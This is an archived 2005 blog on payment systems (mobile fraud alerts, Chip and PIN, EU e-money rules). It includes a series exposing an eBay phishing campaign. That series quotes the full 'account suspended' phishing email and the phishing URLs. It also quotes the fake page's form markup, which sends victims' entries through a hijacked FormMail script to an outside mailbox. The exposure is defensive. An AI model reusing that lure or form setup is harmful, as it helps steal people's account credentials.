Friday, February 25, 2005

MasterCard™ and mBlox Launch First Global Mobile Fraud Detection Solution

http://www.mblox.com/mblox-europe/news/current/2005.02.09.shtml:
MasterCard, the leading global payments solutions company, and mBlox, the world’s mobile messaging transmission and billing specialist, have announced a worldwide cooperation agreement to integrate mBlox’s mobile messaging service with Aristion®, MasterCard’s cutting edge fraud prevention tool. This new solution will become the first global fraud detection and alerting system, offering any bank a high quality, ready to use Short Message Service (SMS)-enabled solution. Existing Aristion users can install it in under an hour.

Sunday, February 20, 2005

Phishing part VI: Qn.com took action: account disabled

The phisher has been caught. Qn.com apparently intervened.
Its website now reads:
Disabled - This accont violated our terms of service.

Still, the AOL-link is still alive.... let's see for how long.
http://members.aol.com/mbrserviceebay/ebay.html

Anyhow, how many phish will be in the net now...?

Phishing part V - Apparently related Domains and IP addresses group #170

Qn.com shows Yakov Yukhananov as the owner. Qn.com offers free subdomains just before the qn. and apparently does not check what the domain-names are used for. As a result the qn.com service may have been mis-used more often. Consequently Mr Yukhananov's name also appears on this page with domain names and IP addresses that have appeared at one time or another to be related by the owner, URLs advertised in unsolicited bulk mail (spam), service providers, or other characteristics:
Apparently related Domains and IP addresses group #170.

Phishing part IV: Security threats of form-mail

To be found here:
http://www.monkeys.com/anti-spam/formmail-advisory.pdf.

Phishing in action part III - Matt's Script Archive: FormMail

Of course I was wondering how this Form-mail in Canada would work. Well this page on Matt's Script Archive: FormMail tells you.

Phishing in action - part II

It looked so great, the phishing site. Because it succeeded in highjacking the URL, so that there's no need to copy the e-bay site. Let real e-bay do that work for you. But you notice it as soon as you hit the Back-button (which brings you back to where you where before the first fake e-bay page). Still the URL reveals that the original link of the Phishing site is:
http://members.aol.com/mbrserviceebay/ebay.html

And the source of that page states: *!-- saved from url=http://kok.8k.com/--*
which is a site that is no longer active.

The mail engine in the source code says:
*form method="post" action="http://www.hc-sc.gc.ca/cgi-bin/fmail.pl"*
*input type="hidden" value="giftcardz@yahoo.com" name="recipient"*
*input type="hidden" value="http://www.ebay.com" name="redirect"*
*input type="hidden" value="ebaY hiT" name="form_subject"*
*table cellSpacing="0" cellPadding="0" bgColor="#999999" border="0"*

So apparently the healt-canada site has been hijacked to serve as a mail receipt engine.

Phishing in action: eBay - Security Center

For those wondering what a phishing site is, have a look at this site, so-called the: "eBay - Security Center". Users get there if they click the link in a mail that reads:

Dear customer,

We regret to inform you that your eBay account will be suspended due to the violation of our site policy below:
* Misrepresentation of Identity (User) - Representing yourself as another eBay user or registering using the identity of another.

Due to the suspension of this account, please be advised you are prohibited from using eBay in any way. This includes the registering of a new account.

Please note that this suspension does not relieve you of your agreed-upon obligation to pay any fees you may owe to eBay.

According to our site policy you will have to confirm that you are the real owner of the eBay account by completing the following form or else your account will be deleted.

http://suspension-ebay.qn.com/ Our apologies for this unconvenience.

Thank you for using eBay! http://www.ebay.com


Well, it almost worked, too bad that:
-I'm not an e-bay user....
-and my e-mail client is non-html.....
Let's see when this link has been brought off-line.

Saturday, February 19, 2005

Payments and Settlements News - P+S-N

Payments and Settlements News - No. 15. contains:
-TARGET2 progress report
-European Parliament’s response to the European Commission’s second communication on clearing and settlement
-MasterCard launches SMS fraud alert system
-United Kingdom – Chip and PIN changeover sees mixed results
-Simpay announces first launch dates and countries for mobile payment services
-Philippine tax collectors try out prepaid m-commerce
-Phone shell for contactless payments
-Mobile gaming boom may force changes to mobile payments
-United States – Reporting system for phishing attempts

Articles, speeches and reports
-Ireland – Financial Stability Report published by the Central Bank and Financial Services Authority of Ireland in 2004
-United Kingdom – Bank of England publishes its first annual Payment Systems Oversight Report
-ECB Working Paper No. 427, “Interlinking securities settlement systems: a strategic commitment?”
-Beyond EMV: next-generation fraud in Europe
-Bank of Finland Discussion Paper 30/2004, “Central counterparty clearing: constructing a framework for evaluation of risks and benefits”
-Bank of Finland Discussion Paper 27/2004, “Less cash on the counter – Forecasting Finnish payment preferences”
-Bank of Finland Discussion Paper 25/2004, “Multi-homing in the market for payment media: evidence from young Finnish consumers”
-Thailand – Working Paper 2004-01, “The use of cash, cheque and electronic payment services in Thailand: changes and challenges for efficiency enhancement”

Thursday, February 17, 2005

CSC to provide card processing technology to Sinsys

Computer Sciences Corporation (CSC) is to provide bespoke IT applications and services, based on its Cams II technology, to financial firms signing up to Sinsys.
See: http://www.finextra.com/fullstory.asp?id=13246

Tuesday, February 15, 2005

Strange discussions

Viviane Reding http://europa.eu.int/comm/internal_market/bank/docs/e-money/guidance_en.pdf
* Following the extensive consultation process that the Commission has undertaken, it is appropriate that the Commission services draw some conclusions and make these public. However, it is not intended to provide a binding interpretation of the treatment of mobile phone operators.

* The BAC concluded in December 2003 that e-money is now being issued under some circumstances by mobile phone operators to their pre-paid customers when those customers purchase some third party services and pay for them using their pre-paid store of value.

* Although there is a school of thought that suggests that no e-money is created when pre-paid customers use their store of value with mobile operators to purchase third party services, othercommentators agree that e-money is created when the monetary value stored on a pre-paid card is accepted as payment by a third party merchant in line with Article 1.3(b)(iii) of the Directive. The Commission services support this view

* The Commission services therefore suggest that when Member State authorities conduct an analysis of whether a mobile operator or other ‘hybrid’ institution is engaged in the issuance of e-money, they consider the form of direct payment relationship between a mobile customer and a third party vendor. This payment relationship may be established when either: a) there is a direct transfer of e-value (as far as the Commission services understand, this may be technically feasible for mobile handsets); orb) the mobile operator acts as a facilitator (or intermediary) in the payment mechanism in such a way that customer and merchant would also have a direct debtor-creditor relationship.

Monday, February 14, 2005

Chip and Pin cards winning acceptance

See: http://www.thisismoney.co.uk/news/article.html?in_article_id=397806&in_page_id=2

Chip and Pin cards came into force on 1 January and require shoppers to type in their personal number rather than just writing their signature. According to Retail Decisions only 34% of users had had all their cards replaced with chip and Pin.

Initial fears that retailers would refuse to accept non-chip and Pin cards from shoppers have proved misguided. Some visually-impaired customers have told This is Money of problems they’ve experienced in getting chip and signature cards. But, for the most part, the banks say the experience for disabled customers has been positive.

Chip and PIN seen through a glass darkly

http://scotlandonsunday.scotsman.com/business.cfm?id=165212005

Monday, February 07, 2005

Secoin -- another e-money club stopped

Secoin has a notification on its home-page explaining that the on-line payment service has been discontinued and that all e-money holders have been reimbursed.